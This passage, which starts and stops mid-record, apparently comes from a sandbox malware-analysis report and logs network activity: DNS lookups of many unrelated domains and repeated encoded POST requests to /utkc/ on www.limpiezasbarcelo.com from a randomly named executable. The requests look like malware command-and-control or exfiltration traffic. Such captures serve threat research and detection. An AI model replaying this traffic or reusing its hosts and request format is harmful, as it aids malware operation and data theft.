                                            Jul 3, 2024 18:54:52.397938967 CEST4975980192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:52.401451111 CEST4975980192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:52.408220053 CEST8049759142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:53.154165983 CEST8049759142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:53.154268026 CEST8049759142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:53.154390097 CEST4975980192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:53.906759024 CEST4975980192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:54.925578117 CEST4976080192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:54.931425095 CEST8049760142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:54.931515932 CEST4976080192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:54.933614016 CEST4976080192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:54.938467026 CEST8049760142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:55.659480095 CEST8049760142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:55.660450935 CEST8049760142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:55.660614967 CEST4976080192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:56.439358950 CEST4976080192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:57.457545042 CEST4976180192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:57.462909937 CEST8049761142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:57.462981939 CEST4976180192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:57.465045929 CEST4976180192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:57.469907045 CEST8049761142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:57.470007896 CEST8049761142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:58.193600893 CEST8049761142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:58.193804026 CEST8049761142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:58.193895102 CEST4976180192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:58.969074965 CEST4976180192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:59.987663984 CEST4976280192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:59.992835999 CEST8049762142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:54:59.993580103 CEST4976280192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:54:59.995413065 CEST4976280192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:55:00.000164986 CEST8049762142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:55:00.746496916 CEST8049762142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:55:00.747028112 CEST8049762142.250.185.83192.168.2.6
                                            Jul 3, 2024 18:55:00.747078896 CEST4976280192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:55:00.749320984 CEST4976280192.168.2.6142.250.185.83
                                            Jul 3, 2024 18:55:00.754115105 CEST8049762142.250.185.83192.168.2.6

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 3, 2024 18:52:30.990633011 CEST6221353192.168.2.61.1.1.1
                                            Jul 3, 2024 18:52:31.007452965 CEST53622131.1.1.1192.168.2.6
                                            Jul 3, 2024 18:52:46.737943888 CEST6500353192.168.2.61.1.1.1
                                            Jul 3, 2024 18:52:46.799369097 CEST53650031.1.1.1192.168.2.6
                                            Jul 3, 2024 18:53:00.128887892 CEST6041653192.168.2.61.1.1.1
                                            Jul 3, 2024 18:53:00.701769114 CEST53604161.1.1.1192.168.2.6
                                            Jul 3, 2024 18:53:14.113137960 CEST4999853192.168.2.61.1.1.1
                                            Jul 3, 2024 18:53:14.196428061 CEST53499981.1.1.1192.168.2.6
                                            Jul 3, 2024 18:53:27.660072088 CEST5525753192.168.2.61.1.1.1
                                            Jul 3, 2024 18:53:27.801043987 CEST53552571.1.1.1192.168.2.6
                                            Jul 3, 2024 18:53:41.050534964 CEST5741353192.168.2.61.1.1.1
                                            Jul 3, 2024 18:53:41.063848972 CEST53574131.1.1.1192.168.2.6
                                            Jul 3, 2024 18:53:49.131145954 CEST6063353192.168.2.61.1.1.1
                                            Jul 3, 2024 18:53:49.592504025 CEST53606331.1.1.1192.168.2.6
                                            Jul 3, 2024 18:54:03.254476070 CEST5475153192.168.2.61.1.1.1
                                            Jul 3, 2024 18:54:03.373831987 CEST53547511.1.1.1192.168.2.6
                                            Jul 3, 2024 18:54:16.645191908 CEST4935553192.168.2.61.1.1.1
                                            Jul 3, 2024 18:54:16.849212885 CEST53493551.1.1.1192.168.2.6
                                            Jul 3, 2024 18:54:30.394635916 CEST6031953192.168.2.61.1.1.1
                                            Jul 3, 2024 18:54:30.616265059 CEST53603191.1.1.1192.168.2.6
                                            Jul 3, 2024 18:54:38.676717043 CEST5199753192.168.2.61.1.1.1
                                            Jul 3, 2024 18:54:38.798491955 CEST53519971.1.1.1192.168.2.6
                                            Jul 3, 2024 18:54:52.193414927 CEST5630353192.168.2.61.1.1.1
                                            Jul 3, 2024 18:54:52.382961035 CEST53563031.1.1.1192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jul 3, 2024 18:52:30.990633011 CEST192.168.2.61.1.1.10xdfabStandard query (0)www.le-kuk.shopA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:52:46.737943888 CEST192.168.2.61.1.1.10xd666Standard query (0)www.limpiezasbarcelo.comA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:00.128887892 CEST192.168.2.61.1.1.10xae22Standard query (0)www.top65s.comA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:14.113137960 CEST192.168.2.61.1.1.10x5b80Standard query (0)www.videos60.comA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:27.660072088 CEST192.168.2.61.1.1.10x1df2Standard query (0)www.vertilehub.xyzA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:41.050534964 CEST192.168.2.61.1.1.10x5639Standard query (0)www.theestrellastore.comA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:49.131145954 CEST192.168.2.61.1.1.10x5672Standard query (0)www.xuzfceth.comA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:54:03.254476070 CEST192.168.2.61.1.1.10xe140Standard query (0)www.hondamechanic.todayA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:54:16.645191908 CEST192.168.2.61.1.1.10x8e7fStandard query (0)www.primefindsstore.shopA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:54:30.394635916 CEST192.168.2.61.1.1.10xdeecStandard query (0)www.ecurtiscustoms.comA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:54:38.676717043 CEST192.168.2.61.1.1.10x98abStandard query (0)www.salecost.co.ukA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:54:52.193414927 CEST192.168.2.61.1.1.10x881cStandard query (0)www.bayviewcribbage.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jul 3, 2024 18:52:31.007452965 CEST1.1.1.1192.168.2.60xdfabNo error (0)www.le-kuk.shop89.31.143.90A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:52:46.799369097 CEST1.1.1.1192.168.2.60xd666No error (0)www.limpiezasbarcelo.comlimpiezasbarcelo.comCNAME (Canonical name)IN (0x0001)false
                                            Jul 3, 2024 18:52:46.799369097 CEST1.1.1.1192.168.2.60xd666No error (0)limpiezasbarcelo.com81.88.48.71A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:00.701769114 CEST1.1.1.1192.168.2.60xae22No error (0)www.top65s.comlcmoji.lc301adbt.comCNAME (Canonical name)IN (0x0001)false
                                            Jul 3, 2024 18:53:00.701769114 CEST1.1.1.1192.168.2.60xae22No error (0)lcmoji.lc301adbt.com156.251.142.107A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:00.701769114 CEST1.1.1.1192.168.2.60xae22No error (0)lcmoji.lc301adbt.com156.251.142.108A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:00.701769114 CEST1.1.1.1192.168.2.60xae22No error (0)lcmoji.lc301adbt.com156.251.142.105A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:00.701769114 CEST1.1.1.1192.168.2.60xae22No error (0)lcmoji.lc301adbt.com156.251.142.106A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:14.196428061 CEST1.1.1.1192.168.2.60x5b80No error (0)www.videos60.comonstatic-pt.setupdns.netCNAME (Canonical name)IN (0x0001)false
                                            Jul 3, 2024 18:53:14.196428061 CEST1.1.1.1192.168.2.60x5b80No error (0)onstatic-pt.setupdns.net81.88.57.70A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:27.801043987 CEST1.1.1.1192.168.2.60x1df2No error (0)www.vertilehub.xyz203.161.49.220A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:41.063848972 CEST1.1.1.1192.168.2.60x5639Name error (3)www.theestrellastore.comnonenoneA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:53:49.592504025 CEST1.1.1.1192.168.2.60x5672No error (0)www.xuzfceth.com152.32.156.214A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:54:03.373831987 CEST1.1.1.1192.168.2.60xe140No error (0)www.hondamechanic.today64.190.62.22A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:54:16.849212885 CEST1.1.1.1192.168.2.60x8e7fNo error (0)www.primefindsstore.shop23.105.172.12A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:54:30.616265059 CEST1.1.1.1192.168.2.60xdeecName error (3)www.ecurtiscustoms.comnonenoneA (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:54:38.798491955 CEST1.1.1.1192.168.2.60x98abNo error (0)www.salecost.co.uk185.151.30.199A (IP address)IN (0x0001)false
                                            Jul 3, 2024 18:54:52.382961035 CEST1.1.1.1192.168.2.60x881cNo error (0)www.bayviewcribbage.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                            Jul 3, 2024 18:54:52.382961035 CEST1.1.1.1192.168.2.60x881cNo error (0)ghs.googlehosted.com142.250.185.83A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • www.le-kuk.shop
                                            • www.limpiezasbarcelo.com
                                            • www.top65s.com
                                            • www.videos60.com
                                            • www.vertilehub.xyz
                                            • www.xuzfceth.com
                                            • www.hondamechanic.today
                                            • www.primefindsstore.shop
                                            • www.salecost.co.uk
                                            • www.bayviewcribbage.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination Port
                                            0192.168.2.64971989.31.143.9080
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:52:31.026048899 CEST477OUTGET /obdd/?3pSl=bXiTJHhxyN&Z6ZTG=iAqH8h/tGKVhLv76hXtDkp/tsoNJZUwghhFRVhBlXKA5k0wUKDpGIsk5Z77aZpW07kzVnHl6/cD+xmMbGt3tKENSOXeInUOEjIwpy90PuGUlpE2byY+FLaYtfu+R+h2f+4odIwk= HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Host: www.le-kuk.shop
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Jul 3, 2024 18:52:31.684258938 CEST1236INHTTP/1.1 200 OK
                                            Date: Wed, 03 Jul 2024 16:52:31 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Server: UD Webspace 3.2
                                            Data Raw: 31 39 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69 73 74 72 69 65 72 74 20 62 65 69 20 75 6e 69 74 65 64 2d 64 6f 6d 61 69 6e 73 2e 64 65 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 69 6d 20 4b 75 6e 64 65 6e 61 75 66 74 72 61 67 20 72 65 67 69 73 74 72 69 65 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 2c 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 56 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 [TRUNCATED]
                                            Data Ascii: 19e0<!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,html{height:100%;margin:0;padding:0;background-color:#fff;font-family:Arial,Verdana,sans-serif}body{text-align:center;background-color:#f0f2f3}.spacerTop{margin-top:40px}a:focus,a:hover,a:link,a:visited{margin:0;padding:0;border:none}.dvLink:focus,.dvLink:hover,.dvLink:link,.dvLink:visited{background:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAJCAYAAAARml2dAAAAHklEQVQImWNgqDzxn6HyxH8GDACToIckhYLIEmgAAAHCOEFxKWXwAAAAAElFTkSuQmCC') right center no-repeat;padding-right:12px;border:0 none;text-decoration:none;font-weight:400;color:#0079c8}.dvLink:hover{text-decoration:underline}.dvLink.no-ico{background:0 0;padding:0}.logo-wrapper{width:100%;background-color:#fff;padding:55px 0}#logo{margin:0 auto;width:600px;height:50px;background-position:left [TRUNCATED]
                                            Jul 3, 2024 18:52:31.684350014 CEST1236INData Raw: 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 2c 30 20 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41
                                            Data Ascii: kground-size:contain,0 0;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUAAAAAyCAMAAAAa0/LmAAAARVBMVEUAAADw8vTf5/Dd3d3P2ujPz8+/zuHCwsKvwtmfttGxsbGPqsqampp/nsKMjIxni7d+fn5QeqxnZ2dAbqQwYp0XTpEAPYad8GA6AAAAAXRSTlMAQObYZgAAB8
                                            Jul 3, 2024 18:52:31.684400082 CEST448INData Raw: 6e 38 35 36 6d 69 48 4e 46 67 54 30 72 5a 6e 4f 76 45 37 32 6f 73 6f 6a 79 30 46 62 4b 48 66 6a 63 59 52 53 6f 75 6c 7a 56 62 68 7a 65 63 50 4b 4c 41 6e 74 51 39 6c 72 67 47 6b 64 55 4f 53 6b 6f 69 4f 63 43 38 62 49 37 48 71 4f 7a 78 45 65 37 78
                                            Data Ascii: n856miHNFgT0rZnOvE72osojy0FbKHfjcYRSoulzVbhzecPKLAntQ9lrgGkdUOSkoiOcC8bI7HqOzxEe7xlEg70P2L0A9uX55FBsSHovMxsrPBbJzex4bQZG/K1D9KHDYr7HnAnFy8Dl9DjHw4c7f0yi4HNeda9UlgSYOqFcCH5/a7u8KFE8EPp2BlpjYsYFMs8N0HwWup67jDDSfFViTDFYpZa4IBCJscyiuCQxYMp8WOP/47f
                                            Jul 3, 2024 18:52:31.684416056 CEST1236INData Raw: 78 50 6f 31 58 35 41 65 42 71 78 69 65 33 61 45 38 52 59 59 56 2f 50 79 62 79 42 79 47 2b 55 6f 2b 45 4b 6a 69 35 78 34 69 64 76 54 78 6d 69 45 6a 41 52 38 4b 5a 41 2b 2b 52 42 67 46 41 6a 39 56 32 55 45 67 38 51 53 6d 65 43 61 4e 5a 6c 79 66 66
                                            Data Ascii: xPo1X5AeBqxie3aE8RYYV/PybyByG+Uo+EKji5x4idvTxmiEjAR8KZA++RBgFAj9V2UEg8QSmeCaNZlyff643tidPIWcyGvQTfCCQ+FPrCwLdp/+nejItfookHCKSXIeYWhCDoOGfOoKpAUONxwaBoNQwR9fUc3bG2dTFMehwX7Xmle/GEU9ZPi+qUFs/SmrnOp/b29hwDK5BuDoQE1xkXh9+VDWx47Ng5+5YkytG/Py47ueqKM
                                            Jul 3, 2024 18:52:31.684437037 CEST83INData Raw: 46 54 6b 53 75 51 6d 43 43 27 29 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 69 6e 64 65 6e 74 3a 2d 39 39 39 39 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35
                                            Data Ascii: FTkSuQmCC');overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,
                                            Jul 3, 2024 18:52:31.684451103 CEST1236INData Raw: 30 29 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 23 6c 6f 67 6f 20 69 6d 67 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 6c 6f 67 6f 2d 68 72 65 66 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67
                                            Data Ascii: 0);text-align:left}#logo img{border:none}.logo-href{display:block;width:320px;height:50px}.header-wrapper{width:100%;background-color:#3e6994}.header{margin:0 auto;width:600px;padding:38px 0;text-align:left;font-size:14px}.title{margin:0;font-
                                            Jul 3, 2024 18:52:31.684464931 CEST1236INData Raw: 74 65 6e 2e 20 41 6c 73 20 4b 75 6e 64 65 20 76 6f 6e 20 75 6e 69 74 65 64 2d 64 6f 6d 61 69 6e 73 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 64 69 65 73 65 20 44 6f 6d 61 69 6e 20 69 6e 20 49 68 72 65 6d 20 3c 61 20 68 72 65 66 3d 22 68
                                            Data Ascii: ten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihrem <a href="https://www.united-domains.de/login/"class="dvLink no-ico"rel="nofollow noopener">Domain-Portfolio</a> jederzeit selbst online konfigurieren (z.B. Web-Weiterleitu
                                            Jul 3, 2024 18:52:31.684494972 CEST79INData Raw: 47 2e 20 3c 73 70 61 6e 3e 26 6e 62 73 70 3b 41 6c 6c 65 20 52 65 63 68 74 65 20 76 6f 72 62 65 68 61 6c 74 65 6e 2e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: G. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.64972381.88.48.71805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:52:46.816431999 CEST754OUTPOST /utkc/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.limpiezasbarcelo.com
                                            Origin: http://www.limpiezasbarcelo.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 210
                                            Referer: http://www.limpiezasbarcelo.com/utkc/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 38 57 4b 53 5a 66 58 64 70 41 63 35 36 73 4f 77 7a 64 36 39 30 46 35 65 7a 51 72 70 31 77 34 4d 74 6b 4b 74 49 5a 61 79 6e 73 62 30 67 56 67 6c 74 38 64 69 2b 57 69 73 4c 4a 2b 78 6b 43 72 4a 55 32 4a 6b 38 4d 58 4b 48 53 6e 46 69 6e 4a 35 42 57 6e 4d 42 56 42 77 46 34 41 4a 2b 5a 33 34 4a 67 31 68 72 6f 49 51 59 32 37 4d 62 41 33 32 57 64 6c 62 4f 77 59 5a 56 73 50 4c 4d 52 6e 4d 30 33 6f 6f 55 4b 79 54 46 4b 64 43 4d 72 74 49 67 33 65 2f 31 35 50 51 68 79 4b 47 38 44 47 71 54 56 66 2b 2b 7a 64 50 32 4d 6e 76 4a 36 6e 6a 48 62 74 6a 43 79 58 6b 74 35 78 33 43 72 31 6f 4b 48 69 51 45 62 73 32 6b 66 6d 77
                                            Data Ascii: Z6ZTG=8WKSZfXdpAc56sOwzd690F5ezQrp1w4MtkKtIZaynsb0gVglt8di+WisLJ+xkCrJU2Jk8MXKHSnFinJ5BWnMBVBwF4AJ+Z34Jg1hroIQY27MbA32WdlbOwYZVsPLMRnM03ooUKyTFKdCMrtIg3e/15PQhyKG8DGqTVf++zdP2MnvJ6njHbtjCyXkt5x3Cr1oKHiQEbs2kfmw
                                            Jul 3, 2024 18:52:47.505155087 CEST367INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:52:47 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.64972481.88.48.71805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:52:49.353669882 CEST778OUTPOST /utkc/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.limpiezasbarcelo.com
                                            Origin: http://www.limpiezasbarcelo.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 234
                                            Referer: http://www.limpiezasbarcelo.com/utkc/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                            Data Raw: 5a 36 5a 54 47 3d 38 57 4b 53 5a 66 58 64 70 41 63 35 36 4e 2b 77 31 36 57 39 39 46 35 64 39 77 72 70 37 51 34 49 74 6b 4f 74 49 59 76 76 6e 2b 2f 30 67 78 6b 6c 71 39 64 69 75 47 69 73 44 70 2f 31 67 43 72 4f 55 32 31 47 38 4a 76 4b 48 53 44 46 69 6c 68 35 41 6e 6e 50 48 46 42 79 4e 59 41 50 77 35 33 34 4a 67 31 68 72 6f 63 2b 59 32 6a 4d 62 55 4c 32 58 38 6b 4e 4e 77 59 65 53 73 50 4c 47 78 6e 41 30 33 6f 4b 55 49 47 35 46 4d 42 43 4d 71 64 49 68 6d 65 38 67 70 50 53 74 69 4c 44 73 32 72 64 52 33 6a 2b 31 79 56 71 6e 4e 33 72 4d 4d 6d 35 62 6f 74 41 51 69 33 6d 74 37 70 46 43 4c 31 43 49 48 61 51 57 4d 67 52 72 72 44 54 62 69 64 43 32 42 39 53 74 62 44 35 46 4b 47 37 72 54 46 2b 2b 51 3d 3d
                                            Data Ascii: Z6ZTG=8WKSZfXdpAc56N+w16W99F5d9wrp7Q4ItkOtIYvvn+/0gxklq9diuGisDp/1gCrOU21G8JvKHSDFilh5AnnPHFByNYAPw534Jg1hroc+Y2jMbUL2X8kNNwYeSsPLGxnA03oKUIG5FMBCMqdIhme8gpPStiLDs2rdR3j+1yVqnN3rMMm5botAQi3mt7pFCL1CIHaQWMgRrrDTbidC2B9StbD5FKG7rTF++Q==
                                            Jul 3, 2024 18:52:50.020333052 CEST367INHTTP/1.1 404 Not Found
                                            Date: Wed, 03 Jul 2024 16:52:49 GMT
                                            Server: Apache
                                            Content-Length: 203
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.64972681.88.48.71805680C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 18:52:51.886478901 CEST1791OUTPOST /utkc/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                            Accept-Language: en-US,en;q=0.9
                                            Accept-Encoding: gzip, deflate
                                            Host: www.limpiezasbarcelo.com
                                            Origin: http://www.limpiezasbarcelo.com
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Cache-Control: no-cache
                                            Content-Length: 1246
                                            Referer: http://www.limpiezasbarcelo.com/utkc/
                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
